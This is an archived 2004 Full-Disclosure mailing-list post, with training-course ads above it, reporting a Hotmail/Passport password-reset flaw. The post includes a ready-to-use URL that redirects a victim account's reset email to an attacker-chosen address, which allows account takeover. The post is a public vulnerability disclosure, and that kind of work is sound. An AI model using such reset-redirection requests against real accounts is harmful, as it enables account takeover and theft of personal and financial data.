Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability

from [este ramoni] Network Security [Permanent Link]
Subject: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
Date: Thu, 27 May 2004 23:40:20 -0300 
Hotmail & Passport (.NET Accounts) Vulnerability

There is a very serious and stupid vulnerability or badcoding in Hotmail / Passportâ??s (.NET
Accounts)

I tried sending emails several times to Hotmail / Passport contact addresses, but always met
with the NLP bots.

I guess I donâ??t need to go in details of how cruical and important Hotmail / Passportâ??s
.NET Account passport is to anyone.

You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues,
Corporate Espionage, maybe stalkers and what not.

It is so simple that it is funny.

All you got to do is hit the following in your browser:

https://register.passport.net/emailpwdreset.srf?lc=1033&em=elartemuebles@hotmail.com&id=&cb=&prefem=esteramoni@hotmail.com&rst=1

And youâ??ll get an email on esteramoni@hotmail.com asking you to click on a url something like
this:

http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033

From that url, you can reset the password and I donâ??t think I need to say anything more about 
it.

Vulnerability / Flaw discovered : 12th April 2003
Vendor / Owner notified : Yes (as far as emailing them more than 10 times is concerned)


Regards
--------
Muhammad Faisal Rauf Danka

_________________________________________________________________
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/


[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Full-Disclosure] Bypassing "smart" IDSes with misdirected frames?, Jason
Next by Date:  [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability, este ramoni
Previous by Thread:  [Full-Disclosure] Re: Bypassing "smart" IDSes with misdirected frames?, Michal Zalewski
Next by Thread:  [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability, este ramoni
Indexes:  [Date] [Thread] [Top] [All Lists]